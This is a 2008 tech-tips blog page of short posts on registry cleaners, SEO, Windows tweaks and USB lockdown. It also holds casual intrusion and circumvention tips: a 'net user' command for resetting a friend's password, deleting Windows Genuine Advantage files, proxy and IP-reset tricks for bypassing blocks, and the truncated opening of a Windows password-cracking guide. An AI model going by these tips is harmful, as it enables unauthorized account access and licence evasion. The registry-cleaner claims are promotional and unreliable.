Saturday, December 27, 2008

Does Vista Need Registry Repair Software?

The short answer is yes. Those who use Windows Vista for their work, games, and research or for using the Internet expect their system to be very fast to do their task. This can be achieved only if the performance of the system is high. In order for the system to work smoothly without any problem and to achieve the best performance the following have to be taken into consideration namely - speed, windows operating system, file clean ups, security, registry and anti-virus software. Of all these the Windows Registry is very important as it is the storehouse of information of all the files maintained in the system.

The Microsoft Windows Vista Registry may be complicated but cleaning it is not so. The Windows registry repair software helps to get rid of all the unwanted materials that hang around in the windows registry. It is enough if the system is just six months old. It would accumulate a whole lot of junk. You will be surprised as to from where on earth all these unwanted files arise. These files are the left over when certain installations and un-installations are done.

One of the main reasons could be upgrading the windows from Windows XP to Windows Vista. There would have been obsolete software that was deleted while upgrading to Windows Vista. Upgrading and un-installing the earlier version, leaves behind unwanted entries in the registry. This is because the same registry is used that existed in Windows XP that has now been upgraded to Windows Vista. Since it is the same registry, it holds all the junk left behind by windows XP while un-installation. Therefore, you might face the same problem that existed in Windows XP of system slow down and decrease in performance.

The problem comes to highlight only when a sudden error message is thrown at you. Frequent error messages appear. Of windows pops up unexpectedly along with error messages. Often windows vista Internet users may find their system to slow down considerably. It leads to low performance of the system. This would indicate that it is time that the system goes for a check-up. To avoid this if the system already had a registry cleaning mechanism by means of having a registry clean up software residing on it, then these problems could have been avoided very easily.The next stage of frequent system restarts and frequent hanging of the system could also be solved by having the registry repair software installed unto your system. This would help in saving all your valuable data that has been created and saved onto your system. Instead of one fine day worrying about the loss of data, it is wise to see to it that you do invest in getting the registry repair software. Using the windows registry software, you could increase the performance of your system and clear all error messages. The windows vista registry repair software could be either got free or be purchased. This can be easily done online, as there are a lot of such software’s are available free and for purchase.

The sad thing is, the registry errors don’t fix themselves. So you need to repair it. You can find good Windows Vista registry repair software and more registry repair articles at this site.

Read More......

5 Things You Should Look For When Choosing Among Many Windows XP Registry Cleaners

There are a lot of Windows XP registry cleaners available for download on the internet. While some of these registry cleaner application are free. Some or not.
Which one of these should you get?
Here are 5 things you should look for to help you to come up to a decision.
Requisite No.1: Can You Create Backups For Your Registry?
You should be able to create a backup of the registry before the registry cleaner starts scanning and repairing of the said registry. The majority of PC users don’t know how to manually back up their registry so these Windows XP registry cleaners should create that backup for you automatically when you start scanning and repairing.
This is very crucial.
There is none of the many registry cleaner that has a 100% safety guarantee when it comes to avoiding deletion of files by accident which are vital to the operating system.
That’s why having a backup registry will give you safety if a unfortunate deletion happens.
Requisite No.2: Can These softwares Find, And Fix, All The Known Problems That Plague Registries?
There are so many potential problems for the registries that you can’t think of. Windows XP registry cleaners should obtain comprehensive databases that will cover all, if not most of these dangers.
Because the primary purpose of the registry cleaner is to clean the registry.
Requisite No.3: Are they Updated Regularly by Their Publishers?
It is important for Windows XP registry cleaners to have outstanding developmental support. Registries get bogged down by excess files from software installations, downloads, and even some websites browsed. New files that get deposited on the registry come up every day.
Updates should be released regularly so that the users can make their registry cleaner software manageable with the changing times.
Requisite No.4: Are They Free From Bugs That Can Jeopardize Your System?
As we said earlier none of the many Windows XP registry cleaners can claim that they are 100% safe registry fixes. At most, these reg cleaners can claim that every step has been taken to ensure that none among the known essential Windows files in the registry will be flagged and deleted.
The registry cleaner you will consider should be able to make the latter guarantee, that none of the known essential Windows files in the registry will be flagged and deleted.
Requisite No.5: Is excellent Customer/User Support Given?
While most of Windows XP registry cleaners have user-friendly interfaces, some of them may be quite confusing for newly users. And the complications of registry cleaning may not be clear to these users.
That is why it is important that registry cleaner tools should have help desks to assist users with their questions.

Read More......

Understanding Operating Systems

Every new computer that’s brought home from the store has an operating system installed onto it. But what most new computer users don’t realize, is that without an operating system, that computer would be a simple shell of possibilities. A powered computer lacking an operating system wouldn’t display anything more than a bunch of confusing text messages that describe the computer’s boot process. At the very end of this process, the computer looks for an operating system and if not found, it will prompt the user to tell it where it is.

Earlier computers didn’t have an operating system and if you have experience with the computers of the early eighties, you’ll remember that most to them didn’t even have a hard drive! These old computers booted an MS-DOS type operating system from drivers stored onto a floppy disk, and in order to use a program, users would remove the boot floppy and then insert a new floppy that contained the program. The floppy not only stored the program (word processor, spreadsheet, etc.), it also stored the drivers that the program needed to communicate with the computer’s hardware. As you can imagine, the cumbersome process of switching from floppy to floppy prompted the birth of the operating system.An operating system is a software program that controls how the computer’s hardware (and installed software) works. It manages the activity of every component and then displays that activity as a user-friendly interface (GUI). It keeps track of where things exist on a computer’s hard drive as well. But perhaps most importantly for the end-user, the operating system is responsible for translating commands issued with a keyboard and mouse into binary code (010110101 stuff) that can communicate with a set of speakers, a printer, a scanner, and more.

With an operating system installed onto a computer’s hard drive, users no longer need to boot a computer with a floppy disk, nor do they need to run programs from a floppy disk. All the drivers of a program are stored onto the computer and used whenever a program is started.

Apple’s Macintosh computer was among the first of a couple systems to establish a user-to-hardware relationship through a user-friendly interface. Today, we have quite a few operating systems. Some of the more popular ones are Windows Vista, Mac OS X, ZETA, IBM, Unix, and Linux. But even still, operating systems have extended onto to non-computer devices such as game consoles, portable music players, and PDAs. Regardless of the device, the operating system installed onto it serves the same purpose across the board: to enable user-to-hardware communication.

When you think about upgrading your computer to a new operating system, be careful to make sure that you have the necessary hardware components. We tried to upgrade one of our Windows 98 machines to Windows XP, but we were cautioned that the former may not be hardware compatible with XP technology. Apparently, the Windows XP operating system requires components that weren’t developed at the time Windows 98 was distributed and if we were to install Windows XP on this machine anyway, the new operating system would look for hardware that the computer didn’t have. And that would be an instant recipe for failure.

Also be careful about installing operating systems that are incompatible with existing hardware. The hardware of Macintosh computers is extremely different from the hardware of Windows computers and under no circumstances will a Windows operating system work on a Macintosh machine!

Read More......

USB Flash Drive Operating Systems

Did you know that you could get an entire operating system on a flash USB drive? Most firmware in modern PCs allows booting from these drives. That means that a bootable flash drive could allow you to launch an operating system, this is commonly called Live USB and applies mostly to Linux operating systems. However, there is a MS Windows version available and some versions of BSD are also available on flash USBs.

Live USBs are good special purpose or brief tasks like doing an operating system install or disk cloning operation across a network, loading a minimal kernel for embedded operations and maintenance tasks.

A properly configured Windows USB flash drive will allow you to install a version of Windows XP on a drive, with extra software if there’s space. To do this, a special utility is required, as well as a fairly large drive. You will end up with a portable, compact emergency version of your operating system.

Live USBs are more commonly used by Linux operating systems, and are closely related to the now-common live CDs. Like CDs, USBs can be used to help test a distribution, recover data and many other tasks. Live USBs have many of the same limitations and benefits of a live CD. It is, however, easier for a live USB’s data to be changed, since CDs are usually permanently written. That makes it easier to use a live USB as personal storage, allowing a user to carry their preferred applications, operating system and configuration. Sharing a single system between multiple users is much easier in this case.

Live USBs can also provide extra privacy, since the USB device is carried by the user and storage in a safe location is easy. However, the small size of these devices also means that they are easily lost and stolen; making backups and encryption more important for USB flash drive operating systems than normal desktop operating systems.

Since USB drives have no moving parts, they are able to have a faster seek time than optical media and hard drives, this means small programs start faster from USB flash drives than from a live CD or hard disk. However, the low data transfer speeds of some USB devices can make booting from them very slow. In addition, older computers may not have a BIOS that supports booting from USB devices. Booting an operating system from a USB drive may slightly reduce the life of the flash drive.

Carrying your own personal operating system in your pocket can be extremely useful for travellers or people using shared computers. Some sites offer tutorials on simplified flash drive installation for many different distributions of Linux (which is the most popular OS for this purpose). These tutorials mean it is much easier to install, boot and run your preferred distribution, with all your settings and files, from a very small drive. Just be sure you have a large enough drive and that you are using it in a computer capable of booting from the USB port.

Read More......

Computer Data Back Up - Everyone Using a Computer Needs It

So you think you’re at the best comforts of a fast computer that loads everything at the speed of light, and suddenly your computer crashes just when you were trying to meet a deadline. You end up totally frustrated but you could not do anything but say goodbye to your term papers, sales reports and important office files because you didn’t create any backup of your files. When you finally succeeded in booting your PC up, hoping that you can retrieve your data this time, the screen shows a fatal error that leaves you no choice but to reinstall your operating system, and that means clearing your entire hard disk and starting fresh from a clean slate. The exact thing may not have happened to you yet, but you can’t be spared from this horror if you don’t start backing up your files before a silent spyware or killer virus trashes them all.
continue reading "Computer Data Back Up - Everyone Using a Computer Needs It"

Read More......




Read More......

PCMCIA-PC Cards - The Necessary Facts

The term PCMCIA in fact refers to the Personal Computer Memory Card International Association, the governing body that oversees the development of the device. However, PCMCIA and PC Cards are used to refer to the devices themselves and the term has become interchangeable.

As laptop and notebook computers gained popularity and widespread use, it became necessary to develop a means to connect them with other peripherals, as is usually done with desktop computers.

PCMCIA and PC Card

Given the wide array of manufacturers, both of notebook computers and peripherals, this hardware was established to make sure that a single interface be created that was compatible with both. This led to the creation of the first PCMCIA or PC Card in 1990.
continue reading "PCMCIA-PC Cards - The Necessary Facts"

Read More......

Computer Makers Making a Shift to Colored Laptops

It’s hard to imagine a world without computers now that they have become so popular. One remembers when computers used to be the sole domain of offices and large corporations who could afford their lofty maintenance costs. In the last 50 years, computers have revolutionized the way we work and conduct business. Learning has also been given a boost because it is not easier and faster to conduct research using computers than using manual methods. Personal computers are now part of daily living in many parts of the world and in the United States that can be one in every four homes. Computer innovations have been getting better and manufacturers have been creating smaller faster computers. This brings us to the laptop which is a modern marvel when it comes to personal computing. Laptops have taken the world by storm because of the advantages that they offer. Laptops have been getting more attractive as they are getting faster and more powerful. Now buyers can choose to customize their purchase right on the Internet before they get the computer shipped. One of the customizations is color.

In the past, anyone wanting to buy a laptop was limited to the classic black and graying models which have now become the norm as far as laptop appearance is concerned. While no one minded the color as long as the machine performed according to specifications, manufacturers have become bolder and have gone a step further. Customization has hit a new high.
continue reading "Computer Makers Making a Shift to Colored Laptops"

Read More......

Thursday, December 25, 2008

Customize the Google



* Use Google Suggest (suggest words while you're typing)
* Add links to competitors
* Rewrite links to point straight to the images in Google Images
* Removes image copying restrictions in Google Book Search
* Secure Gmail and Google Calendar, switch to https
* Block Google Analytics cookies
* Hide the Gmail spam counter
* Make URL previews on sponsored links visible
* Add favicons in the web search result

* Remove ads
* Anonymize your Google userid
* Add a result counter in search result
* Filter spammy websites from search results
* Add links to WayBack Machine (webpage history)
* Remove click tracking
* Add links from Google to your bookmark manager
* Use a fixed font for Gmail mail bodies
* Stream Google search result pages
* Sticky Google Preferences

Really Wonder Full Feature list. and simple to use addon.
Don't Worry friends this is not a Firefox Lovely addon. it can be used along with Internet Explorer too.

Links :
Firefox
Internet Explorer

Enjoy Customize according to your Flavour.

Read More......

Solution : Rapidshare Download Trick

Many peoples have lots of problem in downloading from Rapidshare.
this post is specially for my broadband user friends.

1. Click Start
2. Click run
3. In the run box type "cmd" (without quotes)and click OK
4. When the command prompt opens type the following and hit enter after every new line.

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

Explanation : As all Broadband users has dynamic ip they can simply change their ip address. by the commands mentioned above.


If you are bore of typing this much Command then simply make a batch file.
Creating a Batch file.
Open a notepad. type following in it.

@echo off
ipconfig /flushdns
ipconfig /release
ipconfig /renew
@echo on

Save this file with name you like and the extension as bat.
now simply execute this file.
Enjoy the Download.

Read More......

Free Favicon Maker Online Tool

Use this online tool to easily create a favicon (favorites icon) foryour site. A favicon is a small, 16x16 image that is shown inside thebrowser's location bar and bookmark menu when your site is called up.It is a good way to brand your site and increase it's prominence inyour visitor's bookmark menu.

Favicon maker- Create a favicon from any image

Read More......

Open Blocked Websites....

Steps are described as follows :-

1. Go to Google

2.Type transparent free proxy address free

3.Click on the transparent proxy fresh transparent proxy list

4.Look for a proxy address with port 8080

5.Now go to tools menu of internet explorer

6.Go to internet options

7.connections tab

8.click Activate use a proxy server for ur LAN options

9.Put that number that you found in the website with 8080 port and hit Ok

10.Again Ok Now open any websites. ...........Enjoy Moments of Life Make it Large

Read More......

Building a Brand for your Blog

Everything you do as a blogger can be duplicated by others on just about every level. The one thing you can do to help protect your blogs identity and separate it from the others is to build your brand. Having a strong brand is what makes products in the world successful. Its the thing about a product that really connects to people on a singular level.
When you build your blog it is a good idea to create a brand for it as soon as you can. This doesn’t mean just creating a snazzy logo but rather the whole look, feel and tone of your blog. Think of some of the biggest brands on the Internet. eBay for example will only make small digestible changes to the Yellow and gray shades on the site because of the strong brand they have built over the years. Yahoo, until resent had pretty much the same look for over 10 years and even now it still has that same feel they’ve always had.

Here are a few things to think about when creating your brand.
A free WordPress theme is economical but it doesn’t really set you apart. Nothing says you can’t modify a theme to make it look your own though. A logo or picture of yourself will also help create strong brand. The font you use can even be used to help create your blogs brand. Its really up to you as to how far you want to go with your branding.
Now that you are creating your brand don’t stop with your blog alone. Use the brand whenever possible. Things like your avatars should use your brand so that whenever you leave comments others will identify that comment with your blog. Likewise when you leave a link you can use a certain anchor text to help identify your brand.

Read More......

How To Get Your Blog Ranked High on Google

Some of the ways to increase your blog ranking of Google

1. Select Your Keywords and Keyword PhrasesChoose the keywords and keyword phrases you want your blog post to rank high for on the Google search engine results page. For example, I want my blog post to rank high for the term, "blog ranked high on Google." Currently there are approximately 286,000 pages using this term so I'll have to do everything in my power to compete with these web pages to get my blog post on the first page of the Google results page for that term.My keyword phrase also includes other keyword phrases like, "ranked high on Google" with about 310,000 competing pages and "high on Google" with over 71 million competing pages. Getting to the first page for these terms would be a bonus.

2. Use Your Keywords in Your Blog TitleGoogle pays very close attention to the words and phrases you use in your blog title. Notice how I used the term, "blog ranked high on Google" in the title of this article. It's important to use your keyword phrase in your blog title if you want to rank high for that phrase on the Google results page.Another reason you want to use your keyword phrase in your blog title is to give your reader an immediate understanding as to what your blog post is about. If your blog is listed at the top of the search engine results page for your keyword phrase but no one reads it, it's of no value. Use a title that will cause people to click through to your blog post.The New York Times creates two different titles for their articles. They use a catchy, creative or humorous title for their newspaper, and a keyword specific title for the articles and blogs they post to the Internet. They do this because people looking for jokes about the eating habits of nuns generally go to a search engine and type, "jokes about the eating habits of nuns," not "Nuns, Buns and Puns."

3. Use Your Keywords in Your Blog TextNotice how the keyword phrase, "blog ranked high on Google," is used throughout this blog post. Google pays attention to the text on a blog in order to understand what the blog post is about. Once Google comprehends the content of the blog post, it will categorize the blog based on that information. By using your keyword phrase in your text, both Google and your readers can quickly understand what your blog post is about, allowing Google to accurately categorize your blog making it easy for your clients to find. In the past, search engine consultants encouraged writers to use their keyword phrase in the first 25 words of their text and again in the last sentence. Today, the search engines don't seem to pay as much attention to word placement, but reader's do.If your article is about your keyword phrase, it's a good idea to use it in the first and last sentence because it helps your reader quickly know what your blog post is about. It's also a good idea to use your keyword phrase in the first sentence because that is the text that is most likely to show in the description text on the search results page.

4. Link To Your Blog With Keyword Rich Anchor TextGet as many one-way links leading back to your blog post as possible from as many quality blogs and websites as you can. Do your best to insure that the text people click on to get back to your site includes your keywords and keyword phrases. This is known in Internet marketing circles as anchor text.In this example I want the anchor text leading back to my blog post to have the keyword phrase, "blog ranked high on Google," as the clickable text. The clickable text is the means by which all of those other web sites and blogs tell Google what your blog post is about.Google provides far more weight to the theme of your blog post based on the quality and size of the sites linking back to your blog than the text on your blog. For example, if you do a Google search for the term, "click here," you will be taken to the Adobe Reader download web page. It's interesting to note the term "click here" doesn't appear anywhere on that page. The reason the Adobe Reader download page comes up first for this term is because there are millions of other sites that use the anchor text, "click here," to direct people to the Adobe Reader download page.There are two wonderful ways to get keyword rich anchor text directing people back to your blog post. The first is to write and submit an article about your blog post to other web site and blog owners who will upload your article to their site. In return those web site and blog owners will provide you with a keyword rich anchor text link from your article back to your blog. They get great content for their web site and you get a valuable one-way link back to your blog post.The second way is to encourage other blog owners to write about your blog post. In doing so, they are very likely to use your blog title as the anchor text leading readers back to your post. This is another reason why it's so important to use your keyword phrase in your blog title.

5. Ask Your Readers To Digg Your Blog Post. Ask your readers to tell the rest of the world about your blog post by submitting it to one of the social bookmarking sites. They include DIGG, Stumble, Blink and many others. If the title of your blog post includes your keyword phrase, it is likely that this is how your readers will describe your blog post to the social bookmarking sites. This helps Google decide where to rank your site on the search results page.

6. Blog On A Community Site Recognized Expert, Active Rain, and Christian Blog are all examples of niche community blog sites. Recognized Expert is a site for marketing experts, Active Rain is for real estate professionals and the Christian blog is for, you guessed it, Christians. These niche sites have tons of traffic along with the undivided attention of Google and the other search engines.

Read More......

How to Grow Your Blog Fast

If you follow the following simple steps. You can grow your blog faster and faster.

Blog Material

The most important part about a blog is the type of material that is published on it for Internet visitors to see and use. This material should be carefully designed and placed on the blog so that it is attractive to people who are seeking for information. The material needs to also be produced at the highest quality possible, in order to look professional and provide crucial knowledge about the blog's main category or topic.

Another part of the material has to do with the type of text that is placed on the blog. Every article that is published needs to contain information that is both relevant to the blog's theme and exciting for any visitor to read. The articles are the main part of the blog and are what will help build your blog's popularity in a fast and effective way. Remember to always write high quality articles that will attract a large portion of people that use the Internet on a frequent basis.

Proper Marketing

In order to quickly build up your blog's reputation, you need to perform a lot of effective marketing. This can be accomplished through the principle of networking, which means that you basically spread the information about your blog to as many people as you possibly can. There are many ways that you can tell people about your blog, some of which include email, face to face contact, and the publication of links.

Solid Online Relations:

The final way to help your blog grow faster than you ever thought possible would be to establish online relationships with other bloggers and web site owners. Creating solid relationships with these people will have a direct, positive effect on your blog. They will refer their traffic flow to your blog and make comments about it that are positive and profitable for you.

Read More......

5 Good Reasons to Use Web Site Templates

Some of the main reasons to use the best template for your web site...

1.Professionally designed site

First appearances are everything, this is especially so on the internet. If your site looks amateurish then it is more than likely that someone will press the back button on their browser before they even read your home page, let alone buy anything from you. Web site templates get round this problem as they are designed by professionals who are creating web sites every day. This means that graphics will be well designed and load quickly when people visit your site. The basic design of the site will have been tested with several browsers to ensure compatibility and the navigation system will be functional.

2.Cost

A web site template costs between $20 - $70, compare this to a design cost from scratch of about $500 from a web site designer and you can see that you can make substantial savings by opting for the do it yourself approach. A template is a great starting point for a good looking, well designed site. All you need are some basic editing skills and appropriate software.

3.Speed

Quite simply editing a partially completed web site is much quicker than creating a site from scratch. You avoid problems such as creating navigation menus and optimizing graphics for fast loading of web pages. It typically takes a web designer 5 - 15 days to produce a high quality site.

4.Set structure

A lot of time can be wasted in deciding on the layout of a site. Using a template helps overcome design issues and enables you to focus purely on content. That way you can achieve a more polished product.

5.Universal language

Most web site templates are available either as basic HTML files or as more sophisticated flash sites. The more professional retailers will give you both versions.

This means that if you are working to a budget then you could use a low cost HTML editor to get by or, if you wanted your visitors to have a more involved experience, then you could invest in premium products from Macromedia, Adobe or Microsoft that support most of the features you could ever wish to add to your site.

Read More......

Essential Web Development Tools

Developing a successful web site takes a great deal of planning and preparation. An important part of your preparation is obtaining the essential tools of the trade.

HTML Editors

An HTML editor is a software program used to create and edit HTML documents.

Although some Internet marketers prefer to write their own HTML code, most prefer to use an HTML editor, as it can greatly simplify a somewhat difficult process. However, using an HTML editor has its disadvantages, as some editors have a tendency to add a lot of unnecessary coding and may not support the latest technologies.

Whether you will be writing your own HTML or using an editor, taking the time to learn HTML is very important. Not only will you gain your independence, but you'll also have the ability to add special effects that many HTML editors don't support.

Here are some popular HTML editors:

Macromedia Dreamweaver
http://www.macromedia.com/software/dreamweaver/
A popular WYSIWYG (What you see is what you get) HTML editor. Great for beginners and advanced users alike.

Coffee Cup
http://www.coffeecup.com/html-editor/
A popular HTML editor that's great for beginners as well as advanced users. Includes a built in browser that will enable you to instantly preview your HTML as you go.

Hot Dog Professional
http://sausage.com/products/index.html
Three HTML editors, including HotDog Junior for children, PageWiz for the novice user and Professional for advanced and budding webmasters.

Text Editors

A text editor is a software program used for editing plain text that doesn't add any special formatting.

If you're considering writing your own HTML code, you'll need a good text editor. Although it will certainly be more time consuming, your code will be much cleaner and can reduce your file size considerably.

In addition to using a text editor to write HTML, it can also be used to edit scripts and write articles.

If you have a Windows operating system, Note Pad is the preferred text editor. It should already be installed on your computer.

Although Note Pad is a great little text editor, it can't handle large files and is much better suited for smaller jobs. You may find that you'd like an editor that is more powerful, such as:

NoteTab Pro http://www.notetab.com/
TextPad http://www.textpad.com/

FTP

File Transfer Protocol, better known as FTP, is a procedure used to upload and download files to and from your web server.

Although many HTML editors will enable you to edit and transfer pages to your server, an FTP program is still an essential tool, as you must have complete control over the files on your server.

An FTP program will enable you to upload scripts, set file permissions, create folders and transfer files to and from your server.

In order to use FTP, you'll need to download and install a software program on your computer. The most widely used FTP program is WS FTP Pro http://www.wsftp.com/

Graphics Editor

A graphics editor is a software program that will enable you to design and edit graphics.

Graphic design is an intimidating subject for many Internet entrepreneurs. However, most of us must learn some basic design techniques in order to avoid the high costs of hiring a professional designer.

The most popular program used by Internet marketers is Paint Shop Pro. This powerful program is the only program you'll need to design professional looking graphics.
http://www.jasc.com/

Zip/Unzip Software

A Zip file is an "archive" of one or more files compressed into one file for easy distribution.

Zip files are used to compress and transport file archives over the Internet. It is the preferred method used for electronic file distribution, as rather than downloading several different files, you can simply download one Zip file. In addition, the download time will be minimized, as the files within the Zip archive are compressed.

Once a Zip file is downloaded, it can be easily opened and extracted (unzipped) with a Zip/Unzip software program.

Although there are many Zip software programs available on the Internet, WinZip is the most popular. WinZip makes working with file archives simple. It features an easy point-and-click, drag-and-drop interface for viewing, extracting, adding, deleting and testing archived files.

You can download a fully functional evaluation version here:
http://www.winzip.com/download.htm

Email

Although most Internet Service Providers include email accounts for their customers, these accounts aren't adequate for an Internet business -- especially if you get a large amount of email. Not only do the email addresses contain your ISP's name, but they are also very limited on features and options.

The two most popular email clients used online are Outlook and Eudora. These programs will enable you to download email from your server and offer features, such as sorting and
filtering, and will enable you to easily organize your email messages. What's more, your email address will be your own domain -- not someone else's.

Eudora
http://www.eudora.com/
Outlook
http://www.microsoft.com/

Your webmaster toolbox will play an important part in your success. Take the time to ensure your toolbox contains these essential tools and you'll be well on your way to designing a professional web site.

Read More......

Changing the Title on Windows Media Player

You can change the title bar for the Windows Media Player

1. Start Regedit

2. Go to HKEY_USERS \ .DEFAULT \ Software \ Policies \ Microsoft \ WindowsMediaPlayer

3. Create a string value of TitleBar

4. Give it a value of whatever you want to appear in the title bar

Read More......

Disable USB Ports

Here is a way to disable USB ports in an Active Directory Domain


In Active Directory Users and Computers, open an existing GPO or create a new one and open it. Use the security settings of that GPO to specify which computers it affects.

In that GPO, go to Computer Configuration – Windows Settings – Security Settings – File System and create a new entry (right-click File System and select Add File). Specify the location of USBSTOR.INF (usually SystemRoot%\Inf\USBSTOR.INF)
Change the security settings of the new entry. The security settings that you specify here will be enforced on the USBSTOR.INF of every computer to which the GPO is applied. This process is not additive, which means that the previous security settings of USBSTOR.INF will be overwritten by the ones given in the GPO. It is therefore recommended to grant full control to SYSTEM and local administrators. But unlike in the default security settings of USBSTOR.INF, you should not grant any priviledges to Everybody. You do not need to explicitly deny access – just omit an entry for Everybody. Optionally, you can grant read access to a certain group. Members of this group will be able to use USB storage.

Repeat the above two steps for USBSTOR.PNF.

Download USBSTOR.ADM.

Back in the GPO, right-click Administrative Templates under Computer Configuration and select Add/Remove Templates. Click Add and browse to the location of USBSTOR.ADM. Close the dialog.

You should now have an additional entry called Services and Drivers in Administrative Templates. Click on it. If it is empty, select View from the menu and uncheck Show Policies Only. Click back on Services and Drivers in Administrative Templates. It should now show the USB Storage policy. Double click it, select Enabled and pick Disabled from the Startup Type drop down. Again, the policy must be enabled wheras Startup Type must be Disabled.
Close the dialog as well as the GPO and boot/reboot one of your workstations. Make sure no USB strorage device is connected to that computer. Log on with administrative privileges and check the permissions of USBSTOR.INF and USBSTOR.PNF. Check the value of the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor\Start. It should be 4. It is also ok if the UsbStor key doesn't exist at all.
On the same workstation, log off and back on as a user that should not have access to USB storage. Connect a USB memory stick or a similar device. Nothing should happen. Remove the memory stick.

Log on as a user that should have access to USB storage and execute net start usbstor in a command shell or at Start – Run before connecting the memory stick. The memory stick should initialized and mapped to a drive letter. If USBSTOR fails to start, it's probably because this is the first time a memory stick is plugged into the workstation in which case USBSTOR is not yet installed. Nevertheless, the memory stick should be initialized and mapped correctly but you need to reboot in order to reapply the administrative template such that USBSTOR is disabled again. Alternatively, you can disable it manually by downloading and double clicking USBSTOR.REG as well as executing net stop usbstor.

Instruct the users with access to USB storage that they need to execute net start usbstor before they can connect a USB storage device.

Read More......

Changing XP password without old password

Here is a technique to change XP password of your friend's login pc without knowing any hint or old passwords:

just open CMD PROMPT and type as shown below
C:/ net user username newpassword <----|

for example...

If your friend's username is Gaurav, and you want to change itz password to Bhatia

Type as shown below:

C:/net user Gaurav Bhatia <====

tats all u have successfully changed ur friendz password to "Bhatia"

If you are the admin of pc then go to CMD prompt and type
"""""control userpasswords2""""""
here you can change the password

Read More......

Make Mp3 Files Smaller Without Losing Quality

If you don't already have a copy of MusicMatch Jukebox, download one from musicmatch.com. The "Plus" version has more features and burns CDs faster, but the free version works just fine for converting files


1. Install music match box and then restart your computer if it asks
2. open music matchbox and click file convert files
3. in the bottom right hand corner called 'destination type' change it to mp3 pro.
4.you can edit the bitrate but the higher the bitrate the bigger the size
5. choose the songs you want to convert and click start

**if you want to try something different repeat step one and 2 and instead of making the destintion type mp3 pro make it 'mp3pro vbr'

again the lower the setting the smaller the size

Read More......

10 Tips For Google Image Search

Google Image Search could be used in many ways.

1. If you want to know if a person is a man or a woman and the name doesn't help, do a search for the name.

2. If you don't know the meaning of a word, the pictures may help you.

3. A better search for Flickr. Google uses information from other sites that link to Flickr photos, so you may find Google search better.

4. Find what's interesting about a site, by looking at the pictures included. For example: wired.com.

5. Find a new wallpaper for your desktop by restricting your search to large images. You can automate this using an application.

6. Find random personal pictures, using standard file names from digital cameras.

7. Type the name of a painter and you can take an art class.

8. Install a Greasemonkey script so you can view the original version of the image directly by clicking on the thumbnail.

9. Find the color of a word. "Word Color is a windows program that uses Google Image Search to determine the color of a word or string of words. It goes out there, retrieves the top 9 images and loops through all pixels, calculating the average hue, which is later converted to a color."

10. If you want to grab search results, GoogleGrab is a tool that downloads images from Google Image Search. It even supports batch search.

Read More......

How To Disable Windows Genuine Advantage Notification in 3 Simple Steps

Following three simple steps now you can get rid of the pesky and sometimes buggy Windows Genuine Advantage (WGA) notifications:

1. Reboot Windows in safe mode (hold the f8 key while booting and you will get the option to boot in safe mode) and then:

2. Open Registry Editor (regedit.exe) and search for wgalogon folder and delete it. You should backup up the registry beforehand, in case somethiong goes wrong.

3. In your windows directory search for files wga* and delete them.

You are done!

Now reboot back normally and continue your work. Windows Genuine Advantage will not bother you anymore.

Warning: Use at your own risk. Backup everything before you do.

Read More......

How To Uninstall GrooveMonitor.exe

GrooveMonitor is a service utility that tracks groove behavour and creates reports for error reporting to MS (what else does it report?). It loads on startup. It gets installed when you install Office 2007. However it doesn't get uninstalled when you uninstall Office 2007. GrooveMonitor starts upon Windows startup (via registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).

To remove GrooveMonitor from your machine you have to go to Control Panel and then select Add/Remove programs. GrooveMonitor is one of the displayed applications. Uninstall it from there. That should do it for any normal windows program. Not surprisingly Microsoft himself often violates this basic principle (which surprisingly would give you more control over their crappy [pardon my French] software), and GrooveMonitor will still load on startup.

You can however use msconfig to prevent it from coming up on Windows startup.
1. Go to Start menu and click Run
2. Type msconfig and press Enter.
3. Go to Startup tab and then uncheck any reference to "groovemonitor"
4. Reboot

Note: Some malware may also camouflage themselves as GrooveMonitor.exe, particularly if they are located in c:\windows or c:\windows\system32 folder.

GrooveMonitor is currently owned by Microsoft Corporation.

Read More......

Windows vista speed tweaks

1, Increase external USB hard drive per­formance.

By default, USB storage devices have write caching totally disabled primarily so you can unplug them without bothering with the Safety Remove Software icon in the Tray. Al­though this is handy for flash drives, it significantly slows down external USB hard drives. First, plug in your external USB drive, right-click Computer in the Start menu, and choose Properties. Then, click the Device Manager link, expand the Disk Drives entry by clicking the plus (+) sign, and double-click your external USB hard drive. Click the Policies tab and then click Optimize for Performance. This makes two more options appear: Enable Write Caching on the Disk and Enabled Advance Per­formance. Enable both options and click OK. Rebooting enables the change.

2, Increase SATA drive performance.

Vista's write caching is fairly conserva­tive by default in order to prevent data loss in the event of a power fail­ure. It your desktop PC is connected to a UPS (uninterruptable power sup­ply), or if you're using a notebook computer with a reliable battery, you can set the write caching to be more aggressive. Right-click Computer in the Start menu, choose Properties, and then click the Device Manager link. Expand the Disk Drives entry by clicking on the plus (+) symbol and then double-click your SATA hard drive. Click the Policies tab, check Enable Advanced Performance, and click OK. Rebooting Vista will enable this change.

3, Disable Network Printer Search.

Vista normally searches for new net­work printers when you browse your LAN. But if you aren't regularly ad­ding printers to your network, this searching slows things down. To dis­able this feature, click Network from the Start menu, which opens the Network window. Press ALT to make the Menu Bar visible if it isn't already and then choose Polder Options from the Tools menu. Finally, click the View tab. uncheck Automatically Search for Network Printers, and then click OK.

4, Turn unneeded Vista features off.
Windows Vista adds hundreds of fea­tures when it is installed. Not all of them arc enabled by default, but you probably don't need many that arc, any­way. Disabling those you don't need saves resources and speeds your system up. To find these and disable them, open the Windows Control Panel and switch to Classic View. Next, double click the Programs and Features icon and then click the Turn Windows Features on or off link on the left side or the window. After a moment, a large list appears with checkboxes. Those that are checked are enabled and those that aren't arc disabled. Different versions of Vista have different features enabled, so expand any collapsible entries by click­ing the plus (+) sign to see what's turned on and disable what you don't need. For example, if you don't have a Tablet PC, you can safely disable Tablet PC Options Components. Click OK when you're done, and your computer will restart if necessary.

Read More......

Windows 2000 / XP / 2003 / Vista Password Breaking & Cracking

Before starting, for newbies…

* Windows NT 5.0 = Windows 2000 (all edition)
* Windows NT 5.1 = Windows XP (all edition)
* Windows NT 5.2 = Windows 2003 (all edition)

So throughout this post I will refer our target as Windows NT 5.x (as following content are equally applicable to all Windows NT 5.x OS family).

So lets start the fun. You will be surprised to know that you can break into any Windows NT 5.x system without any software tool 80% of the time! So does this mean you can break into 80% of the system only???

No No No, If this would have been true, I’d never posted this. I believe in 100% result. So for 20% system there are another ‘n’ no. of ways and I’ll tell u a bit insecure way later. First lets get to 80% of the vulnerable system.

